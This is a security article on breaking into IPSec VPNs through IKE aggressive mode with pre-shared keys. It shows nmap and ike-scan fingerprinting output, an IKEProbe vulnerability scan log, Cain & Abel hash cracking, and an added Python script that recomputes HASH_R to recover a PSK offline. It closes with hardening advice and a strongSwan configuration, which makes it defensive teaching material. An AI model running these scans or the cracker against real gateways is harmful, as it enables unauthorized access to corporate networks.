Virtual Private Network Security Threat
Dynamic Security can dry up the reserve of passwords that hackers use to penetrate VPNs.
Michael Thumann
Breaking into a VPN
Sloppy configurations make for unsecured VPNs
IPSec, the security extension of IP, is generally considered the most secure VPN technology. But it has weak points of its own that specialised tools can find and exploit. Prudent administrators therefore test their own network before the attackers do.
Virtual Private Networks (VPNs) save a lot of money by carrying data over the Internet instead of expensive dedicated lines, and modern encryption and authentication methods keep that data confidential even on a public network. The most important protocol for building VPNs today is IPSec, which is unfortunately also the most complex. IPSec can be used not only to link entire enterprise networks across the Internet but also to connect mobile users to their company's mail and database servers.
At the same time, this complexity is itself a security risk. Configuring an IPSec VPN correctly takes expertise and experience, two requirements that an astonishing number of administrators do not meet. Combined with the lazy acceptance of default settings in many devices and programs, this produces preventable weak points that leave dangerous entry points open to attackers.
Last stop: security
The encryption used by a VPN is practically never the weak point, so the best places to attack are the two end points: on one side the VPN gateway, the company's central dial-in point, and on the other the VPN client, typically a mobile user's notebook.
Notebooks are the more common target, whether through outright theft or through security holes in the operating system and applications. Wireless networks in hotels and airports are especially promising hunting grounds, because there it is very likely that someone will be setting up a VPN tunnel to their company to exchange data.
Most VPN vendors ship client software with an integrated firewall to block access to the machine, but not every user actually installs and enables it. Once the VPN connection is up, an attacker who has compromised the notebook can move around inside the enterprise network through it and reach confidential data, if that data was not already lying on the local hard disk.
But the company's gateway may also offer hackers a few entry points. And unlike mobile devices, it is of necessity constantly reachable via the Internet, making it directly exposed to attacks.
Footprints
In preparing for an attack, hackers first collect all available information. A VPN gateway is relatively easy to identify. All you need is a port scanner like nmap, which will produce output such as the following:
```
# nmap -sSUV -O 10.1.1.254
Starting nmap 3.70
Interesting ports on 10.1.1.254:
PORT     STATE         SERVICE
256/tcp  open          fw1-secureremote
257/tcp  open          fw1-log
259/udp  open|filtered firewall1-rdp
500/udp  open|filtered isakmp
1701/udp open|filtered L2TP
Device type: firewall
Running: Checkpoint Windows NT/2K/XP
OS details: Checkpoint SecurePlatform NG FP3
```
The combination of ports reached already identifies the firewall as a Check Point product, and nmap's OS fingerprinting together with its service detection (the version output is not shown above) narrows it down to Firewall-1 NG on SecurePlatform. UDP port 500 is the clearest sign that the firewall also acts as a VPN gateway: this is the port of IKE (Internet Key Exchange), the key-management protocol of IPSec, over which the peers negotiate and protect their key exchange. Note that nmap reports the UDP ports as open|filtered because it got no answer to its probes, so a UDP scan alone does not prove that IKE is listening; the IKE-specific probe in the next step does. A gateway that supports NAT traversal will additionally answer on UDP port 4500.
Fingerprints
Special tools can even detect the cryptographic methods and parameters that the gateway uses, providing even more indications of the vendor. The free program IKE-Scan [1] handles this task:
```
# ike-scan 10.1.1.254 --trans=5,2,1,5 -o
Starting ike-scan 1.2 with 1 hosts
10.1.1.254   IKE Main Mode Handshake returned (1 transforms)

IKE Backoff Patterns:

IP Address   No.  Recv time            Delta Time
10.1.1.254   1    1092956328.817392    0.000000
10.1.1.254   2    1092956330.923392    2.106000
10.1.1.254   3    1092956332.885392    1.962000
10.1.1.254   4    1092956334.833392    1.948000
10.1.1.254   5    1092956336.836392    2.003000
10.1.1.254   6    1092956338.835392    1.999000
10.1.1.254   7    1092956340.844392    2.009000
10.1.1.254   8    1092956344.875392    4.031000
10.1.1.254   9    1092956348.882392    4.007000
10.1.1.254   10   1092956352.866392    3.984000
10.1.1.254   11   1092956356.902392    4.036000
10.1.1.254   12   1092956360.883392    3.981000
10.1.1.254   Implementation guess: Firewall-1 4.1/NG
```
The option "--trans=5,2,1,5" specifies the single transform to propose, in the order encryption algorithm, hash algorithm, authentication method and Diffie-Hellman group: 3DES, SHA1, pre-shared key, DH group 5. The message "IKE Main Mode Handshake returned" shows that the gateway accepts these parameters. The "-o" switch (long form "--showbackoff") makes ike-scan keep listening for the gateway's retransmissions of its reply; the retransmission schedule (here roughly 2 seconds, later 4 seconds) is implementation-specific and is matched against ike-scan's pattern file to produce the "Implementation guess", which names the vendor directly. The tool only gets this far if the gateway actually supports the proposed parameters. Otherwise you have to work through the IKE and IPSec combinations yourself, either manually or with a script, for example by repeating "--trans" with other values.
Too fast
Whether the disclosure of such information counts as a security problem is perhaps a matter of opinion. The operator of a VPN has a real problem, however, if an attacker manages to break the authentication and log in at the gateway. Under certain circumstances this is not even difficult, for example when a pre-shared key (PSK) is used for authentication and the gateway operates in "aggressive mode". Aggressive mode shortens the IKE phase-1 handshake to speed things up: instead of the six messages of the conservative main mode, only three are exchanged. The saving comes at a price, because aggressive mode is vulnerable to a targeted attack.
The reason is the order of the messages. In main mode the identities and the authentication hashes are only sent after the Diffie-Hellman exchange, under encryption. In aggressive mode the responder's very first reply already carries its identity and the authentication hash HASH_R, which is computed with a key derived from the PSK and the two nonces over values that are all visible on the wire (the Diffie-Hellman public values, the cookies, the initiator's SA payload and the responder's identity). Since this hash is sent in the clear, anyone who sees it can reconstruct the pre-shared key offline with a dictionary or brute-force attack [2]. Depending on the quality of the key, this takes a few minutes, a few months or a few years. Obtaining the hash is not hard: in aggressive mode the gateway sends it to any VPN client that attempts to connect, which is to say to the attacker as well.
Script kiddy
IKEProbe, developed by ERNW, scans IPSec VPN gateways for exactly this weakness [3]. The tool simulates a VPN client and attempts an IKE handshake in aggressive mode. It walks through all the IKE parameter combinations it supports and checks for each whether the gateway answers with the message containing the PSK hash. As soon as such a reply arrives, the gateway is vulnerable. A scan of a vulnerable gateway with IKEProbe looks like this:
```
# ikeprobe 10.1.1.254
IKE Aggressive Mode PSK Vulnerability Scanner

Supported Attributes
Ciphers              : DES, 3DES, AES-128, CAST
Hashes               : MD5, SHA1
Diffie Hellman Groups: DH Groups 1, 2 and 5

IKE Proposal for Peer: 10.1.1.254
Aggressive Mode activated ...
Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 1
0.000 3: ph1_initiated(00443ee0, 00384708)
0.010 3: < ph1 (00443ee0, 244)
0.030 3: > 40
0.030 2: sx_recv_notify: invalid doi
2.532 3: < ph1 (00443ee0, 244)
5.537 3: < ph1 (00443ee0, 244)
8.541 3: ph1_disposed(00443ee0)
(...)
Attribute Settings:
Cipher 3DES
Hash SHA1
Diffie Hellman Group 5
64.551 3: ph1_initiated(00443ee0, 00384708)
64.662 3: < ph1 (00443ee0, 340)
64.692 3: > 328
64.842 3: ph1_get_psk(00443ee0)
System is vulnerable!!
Hash cracked
```
The log reads as follows: the first proposal (DES, SHA1, DH group 1) is answered with a short 40-byte packet that IKEProbe logs as a notification ("invalid doi"), the proposal is retransmitted and finally discarded ("ph1_disposed"). The proposal 3DES, SHA1, DH group 5 gets a 328-byte reply, which is the responder's aggressive-mode message carrying the PSK hash ("ph1_get_psk"), and IKEProbe reports the system as vulnerable. Note that it is the gateway's willingness to answer an unauthenticated aggressive-mode proposal with that hash, not the specific cipher suite, that makes it vulnerable.
Attacking such a gateway is astonishingly easy. Cain & Abel, a password sniffing and cracking tool, can listen on the wire while IKEProbe is running and, with its IKE parser, pick the hash and all the cleartext handshake fields it was computed over (cookies, nonces, Diffie-Hellman values, SA and ID payloads) out of the traffic [4].
[Figure: Cain sniffs the hash value during the IKE handshake between IKEProbe and the gateway]
But Cain & Abel can do more: its password cracker recovers the key belonging to the hash, by a dictionary attack or by brute force depending on the configuration. In principle a good key cannot be cracked in any reasonable time; in practice, good pre-shared keys are surprisingly rare.
One reason is that people still believe such attacks are harder than they actually are. A list of one million words, for instance, is tried in under a minute. Even a somewhat dated PC with a 1.2 GHz processor needs only around two hours to try every combination of lowercase letters for a six-character key. Two more characters raise that to 55 days, and allowing uppercase letters and digits as well to 148 years. These figures are for the hardware of 2004; today's GPU-based crackers are orders of magnitude faster, so the margin a given key length buys has shrunk accordingly.
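The following Python program is an added example, not code from the original article or from IKEProbe or Cain & Abel. It implements the computation described above and the offline dictionary attack that follows from it: the RFC 2409 derivation SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), with prf being HMAC over the negotiated hash, and then a cracker that recomputes HASH_R for every candidate word and compares it with the sniffed value. The "captured" handshake is constructed in the script with a seeded hash so that it runs offline; the Diffie-Hellman public values are just opaque byte strings of the right length, which is all the hash needs, and the wordlist and the PSKs "secret123" and the 20-character strong key are made up for the demonstration.

```python
"""IKEv1 aggressive-mode PSK recovery (RFC 2409), as an added example.

Not code from the original article or from the tools it names. All
handshake values below are constructed, not a real capture.
"""
import hashlib
import hmac


def prf(hash_name, key, data):
    """RFC 2409 prf: HMAC keyed with `key` over the negotiated hash."""
    return hmac.new(key, data, hash_name).digest()


def skeyid_psk(hash_name, psk, ni_b, nr_b):
    """SKEYID for pre-shared-key authentication = prf(PSK, Ni_b | Nr_b)."""
    return prf(hash_name, psk, ni_b + nr_b)


def hash_r(hash_name, psk, c):
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).

    In aggressive mode the responder sends this in its first reply, before
    any encryption exists, so every input except the PSK is on the wire.
    """
    skeyid = skeyid_psk(hash_name, psk, c["ni_b"], c["nr_b"])
    msg = (c["g_xr"] + c["g_xi"] + c["cky_r"] + c["cky_i"]
           + c["sai_b"] + c["idir_b"])
    return prf(hash_name, skeyid, msg)


def fake_bytes(label, n):
    """Deterministic filler standing in for random on-the-wire values (constructed)."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(label.encode() + counter.to_bytes(2, "big")).digest()
        counter += 1
    return out[:n]


def constructed_capture(psk, hash_name="sha1", group_id=b"vpnusers"):
    """Build the cleartext fields a sniffer sees in an aggressive-mode exchange.

    Sizes: 1536-bit MODP (DH group 5) public values, 8-byte cookies, 16-byte
    nonces, a stand-in SA payload body and an ID payload body of type
    ID_KEY_ID (11) with a group name, as used for road-warrior group PSKs.
    """
    cap = {
        "g_xr": fake_bytes("g_xr", 192),
        "g_xi": fake_bytes("g_xi", 192),
        "cky_r": fake_bytes("cky_r", 8),
        "cky_i": fake_bytes("cky_i", 8),
        "sai_b": fake_bytes("sai_b", 52),
        "idir_b": b"\x0b\x00\x00\x00" + group_id,  # ID type, proto, port, data
        "ni_b": fake_bytes("ni_b", 16),
        "nr_b": fake_bytes("nr_b", 16),
        "hash_name": hash_name,
    }
    cap["hash_r"] = hash_r(hash_name, psk.encode(), cap)  # what the gateway leaks
    return cap


def crack_psk(cap, wordlist):
    """Offline dictionary attack: recompute HASH_R per candidate and compare."""
    target = cap["hash_r"]
    for word in wordlist:
        if hmac.compare_digest(hash_r(cap["hash_name"], word.encode(), cap), target):
            return word
    return None


# Constructed wordlist; a real run uses a large dictionary plus mangling rules.
WORDLIST = ["password", "cisco", "vpn", "Summer2004", "secret123", "letmein"]


def demo_weak():
    """A PSK that appears in the wordlist falls immediately."""
    return crack_psk(constructed_capture("secret123"), WORDLIST)


def demo_strong():
    """A long random PSK that is not in the list survives the dictionary attack."""
    return crack_psk(constructed_capture("Zq7!pL2#vN9$wX4&mB6^"), WORDLIST)


if __name__ == "__main__":
    print("weak PSK recovered:", demo_weak())
    print("strong PSK recovered:", demo_strong())
```

The point to take away is that nothing in `crack_psk` talks to the gateway: after one sniffed (or self-initiated) aggressive-mode exchange the attacker tests candidates at the speed of an HMAC computation, and the gateway's lockout or logging never sees a single failed login.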
[Figure: Cain has succeeded in calculating the pre-shared key]
With the cracked key in hand, an ordinary VPN client such as PGPNet from PGP or Sentinel is all it takes to establish a tunnel to the gateway [5]. To reach anything inside the enterprise network the attacker still has to guess the IP subnets behind the gateway, but that is only a matter of time. A firewall behind the gateway would limit access to network resources, which is why VPN gateways are often placed in a separate demilitarized zone (DMZ), so that the decrypted traffic can be filtered again before it enters the LAN.
Safety net
Whether a VPN gateway uses the risky aggressive mode depends on its settings. In some products it is even the default, for example in some Cisco equipment and in old versions of Check Point's Firewall-1. Other implementations such as FreeS/WAN do without it altogether and restrict IKE to the conservative main mode, which every IPSec implementation has to support. (IKEv2 later dropped aggressive mode entirely.)
The simplest way to avoid the risks described here is to forego pre-shared keys altogether and authenticate with smartcards, hardware tokens or X.509 certificates instead. If PSKs are unavoidable because the budget allows nothing else or a migration would be too disruptive, use keys of at least 20 characters mixing letters, digits and special characters, and disable aggressive mode on the gateway so that the hash is never sent in the clear. Afterwards, verify the setting from the outside with the same tools an attacker would use: an aggressive-mode probe against your own gateway must come back empty. (dab)
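As an added illustration of that advice, not taken from the article or from any vendor documentation: the two connection definitions below show the weak setting beside the hardened one in the syntax of strongSwan's ipsec.conf (an assumption; the article itself mentions only FreeS/WAN, which has no aggressive mode at all). The connection names, subnet, certificate file name and identities are made up.

```conf
# Weak: IKEv1 aggressive mode with a group pre-shared key.
# Any client that names the group gets the HASH_R value in the clear.
conn roadwarrior-weak
    keyexchange=ikev1
    aggressive=yes
    authby=secret
    left=%defaultroute
    leftsubnet=10.1.0.0/16
    leftid=@vpn.example.com
    right=%any
    rightid=@vpnusers
    auto=add

# Hardened: main mode only, X.509 certificates instead of a PSK,
# and an explicit proposal instead of the implementation's defaults.
conn roadwarrior
    keyexchange=ikev1
    aggressive=no
    authby=pubkey
    ike=aes256-sha256-modp2048!
    esp=aes256-sha256!
    left=%defaultroute
    leftsubnet=10.1.0.0/16
    leftcert=gatewayCert.pem
    leftid=@vpn.example.com
    right=%any
    auto=add
```

With "aggressive=no" the gateway will not answer an aggressive-mode proposal, so a scanner such as IKEProbe gets nothing to hand to a cracker; with certificate authentication there is no pre-shared key to recover even if a main-mode exchange were somehow exposed.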
[1] IKE-Scan
[2] Brute Force - Attacks on passwords in Windows networks
[3] IKEProbe
[4] Cain & Abel
[5] PSK Cracking using IKE Aggressive Mode
[6] Cisco Security Notice: Response to BugTraq - Internet Key Exchange Issue